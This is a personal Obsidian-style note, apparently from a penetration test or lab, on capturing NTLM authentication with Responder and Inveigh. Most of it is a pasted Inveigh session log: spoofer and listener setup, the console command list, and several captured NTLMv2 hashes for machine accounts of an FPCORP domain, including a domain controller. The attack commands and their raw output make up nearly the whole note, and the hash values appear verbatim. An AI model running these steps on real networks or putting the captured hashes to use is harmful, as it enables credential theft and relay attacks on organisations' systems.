NTLM Capture

created: "2025-05-25 23:32"
tags:
  - NTLM_Relay
Type: Note
aliases:
updated: "2026-01-20 13:19"

常用工具
Responder

Responder -I tun0

windows用Inveigh.exe

Microsoft Windows [版本 10.0.20348.3807]
(c) Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd C:\Users\Public

C:\Users\Public>Inveigh.exe
[*] Inveigh 2.0.11 [Started 2025-11-09T15:39:51 | PID 6892]
[+] Packet Sniffer Addresses [IP 172.22.20.38 | IPv6 fe80::c9e8:95cd:3cd9:d1c%15]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.22.20.38 | IPv6 fe80::c9e8:95cd:3cd9:d1c%15]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Public]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
System.Net.Sockets.SocketException (0x80004005): 以一种访问权限不允许的方式做了一个访问套接字的尝试。
   在 System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress)
   在 System.Net.Sockets.Socket.Bind(EndPoint localEP)
   在 System.Net.Sockets.TcpListener.Start(Int32 backlog)
   在 Quiddity.HTTPListener.Start(IPAddress ipAddress, Int32 port, String type)
System.Net.Sockets.SocketException (0x80004005): 以一种访问权限不允许的方式做了一个访问套接字的尝试。
   在 System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress)
   在 System.Net.Sockets.Socket.Bind(EndPoint localEP)
   在 System.Net.Sockets.TcpListener.Start(Int32 backlog)
   在 Quiddity.HTTPListener.Start(IPAddress ipAddress, Int32 port, String type)
[.] [15:41:41] TCP(8080) SYN packet from 172.22.20.165:49896
[.] [15:42:11] SMB1(445) negotiation request detected from 172.22.20.38:59125
[.] [15:42:11] SMB2+(445) negotiation request detected from 172.22.20.38:59125
[.] [15:43:41] TCP(8080) SYN packet from 172.22.20.165:49897
[.] [15:45:41] TCP(8080) SYN packet from 172.22.20.165:49899
[.] [15:47:41] TCP(8080) SYN packet from 172.22.20.165:49915
[.] [15:49:41] TCP(8080) SYN packet from 172.22.20.165:49917
[.] [15:51:41] TCP(8080) SYN packet from 172.22.20.165:49918


Invalid Command
============================================================ Inveigh Console Commands ============================================================

Command                           Description
==================================================================================================================================================
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES              | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
GET IGNOREQUERIES               | get IgnoreQueries parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

================================================================= NTLMv2 Hashes ==================================================================

Hashes
==================================================================================================================================================
FPSRVFS02$::FPCORP:1662E59A33BB510E:9A7D26EC54BC407951FF34EF6DCCD937:0101000000000000CEFF3DF35151DC01333835A7A1A241630000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800CEFF3DF35151DC0106000400020000000800300030000000000000000000000000400000BDC9A9BA2FF6BAEF6195197D0A67E20ECECBDD8E7549115A2BE3DFA6ABC335420A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
FPSRVFS02$::FPCORP:1662E59A33BB510E:9A7D26EC54BC407951FF34EF6DCCD937:0101000000000000CEFF3DF35151DC01333835A7A1A241630000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800CEFF3DF35151DC0106000400020000000800300030000000000000000000000000400000BDC9A9BA2FF6BAEF6195197D0A67E20ECECBDD8E7549115A2BE3DFA6ABC335420A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
FPSRVFS02$::FPCORP:5C8CA6C0B09BAD0D:E874F8E9969CC5E7A854DD73583EAE9F:0101000000000000C66347065251DC016C545852B7390FB70000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800C66347065251DC0106000400020000000800300030000000000000000000000000400000BDC9A9BA2FF6BAEF6195197D0A67E20ECECBDD8E7549115A2BE3DFA6ABC335420A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
FPSRVAD01$::FPCORP:F699FBC7F31D85F2:42551D1FB9BDFADA2729110BC1B2409C:0101000000000000357BFF235251DC0190CD59EDBDCF04560000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800357BFF235251DC010600040002000000080030003000000000000000000000000040000042BDD4CBE53B9CD00D7CB8D57F1500C7ADA5AB91B79939ADD8D1055FF4E155310A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000

C(0:0) NTLMv1(0:0) NTLMv2(2:4)>

[.] [16:19:53] TCP(8080) SYN packet from 172.22.20.165:49961
[.] [16:21:53] TCP(8080) SYN packet from 172.22.20.165:49963
[.] [16:22:13] TCP(445) SYN packet from 172.22.20.32:49760
[.] [16:22:13] SMB1(445) negotiation request detected from 172.22.20.32:49760
[.] [16:22:13] SMB2+(445) negotiation request detected from 172.22.20.32:49760
[+] [16:22:13] SMB(445) NTLM challenge [1662E59A33BB510E] sent to 172.22.20.38:49760
[+] [16:22:13] SMB(445) NTLMv2 captured for [FPCORP\FPSRVFS02$] from 172.22.20.32(FPSRVFS02):49760:
FPSRVFS02$::FPCORP:1662E59A33BB510E:9A7D26EC54BC407951FF34EF6DCCD937:0101000000000000CEFF3DF35151DC01333835A7A1A241630000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800CEFF3DF35151DC0106000400020000000800300030000000000000000000000000400000BDC9A9BA2FF6BAEF6195197D0A67E20ECECBDD8E7549115A2BE3DFA6ABC335420A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
[!] [16:22:13] SMB(445) NTLMv2 for [FPCORP\FPSRVFS02$] written to Inveigh-NTLMv2.txt
[+] [16:22:13] SMB(445) NTLMv2 captured for [FPCORP\FPSRVFS02$] from 172.22.20.32(FPSRVFS02):49760 [not unique]
[.] [16:22:13] TCP(445) SYN packet from 172.22.20.32:49763
[.] [16:22:13] SMB2+(445) negotiation request detected from 172.22.20.32:49763
[+] [16:22:16] SMB(445) NTLM challenge [1081B7E650D40883] sent to 172.22.20.38:49760
[.] [16:22:16] SMB(445) NTLM null response from 172.22.20.32(FPSRVFS02):49760
[+] [16:22:16] SMB(445) NTLM challenge [D5103CDBA11ABAF0] sent to 172.22.20.38:49760
[.] [16:22:16] SMB(445) NTLM null response from 172.22.20.32(FPSRVFS02):49760
[.] [16:22:45] TCP(445) SYN packet from 172.22.20.32:49766
[.] [16:22:45] SMB1(445) negotiation request detected from 172.22.20.32:49766
[.] [16:22:45] SMB2+(445) negotiation request detected from 172.22.20.32:49766
[+] [16:22:45] SMB(445) NTLM challenge [5C8CA6C0B09BAD0D] sent to 172.22.20.38:49766
[+] [16:22:45] SMB(445) NTLMv2 captured for [FPCORP\FPSRVFS02$] from 172.22.20.32(FPSRVFS02):49766 [not unique]
[.] [16:22:45] TCP(445) SYN packet from 172.22.20.32:49769
[.] [16:23:34] TCP(445) SYN packet from 172.22.20.25:50213
[.] [16:23:34] SMB1(445) negotiation request detected from 172.22.20.25:50213
[.] [16:23:34] SMB2+(445) negotiation request detected from 172.22.20.25:50213
[+] [16:23:34] SMB(445) NTLM challenge [F699FBC7F31D85F2] sent to 172.22.20.38:50213
[+] [16:23:34] SMB(445) NTLMv2 captured for [FPCORP\FPSRVAD01$] from 172.22.20.25(FPSRVAD01):50213:
FPSRVAD01$::FPCORP:F699FBC7F31D85F2:42551D1FB9BDFADA2729110BC1B2409C:0101000000000000357BFF235251DC0190CD59EDBDCF04560000000002000C004600500043004F0052005000010014004600500053005200560049004900530030003300040014006600700063006F00720070002E0069006E00740003002A0046005000530052005600490049005300300033002E006600700063006F00720070002E0069006E007400050014006600700063006F00720070002E0069006E00740007000800357BFF235251DC010600040002000000080030003000000000000000000000000040000042BDD4CBE53B9CD00D7CB8D57F1500C7ADA5AB91B79939ADD8D1055FF4E155310A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00320032002E00320030002E00330038000000000000000000
[!] [16:23:34] SMB(445) NTLMv2 for [FPCORP\FPSRVAD01$] written to Inveigh-NTLMv2.txt
[.] [16:23:35] TCP(445) SYN packet from 172.22.20.25:50216
[+] [16:23:37] SMB(445) NTLM challenge [E84A312B8C4FF7C9] sent to 172.22.20.38:50213
[.] [16:23:38] SMB(445) NTLM null response from 172.22.20.25(FPSRVAD01):50213
[+] [16:23:38] SMB(445) NTLM challenge [49FE1F2895181439] sent to 172.22.20.38:50213
[.] [16:23:38] SMB(445) NTLM null response from 172.22.20.25(FPSRVAD01):50213
[.] [16:23:53] TCP(8080) SYN packet from 172.22.20.165:49969
[.] [16:25:53] TCP(8080) SYN packet from 172.22.20.165:49973
[.] [16:27:11] SMB1(445) negotiation request detected from 172.22.20.38:59136
[.] [16:27:11] SMB2+(445) negotiation request detected from 172.22.20.38:59136
[.] [16:27:53] TCP(8080) SYN packet from 172.22.20.165:49977

Pasted image 20251109162918.png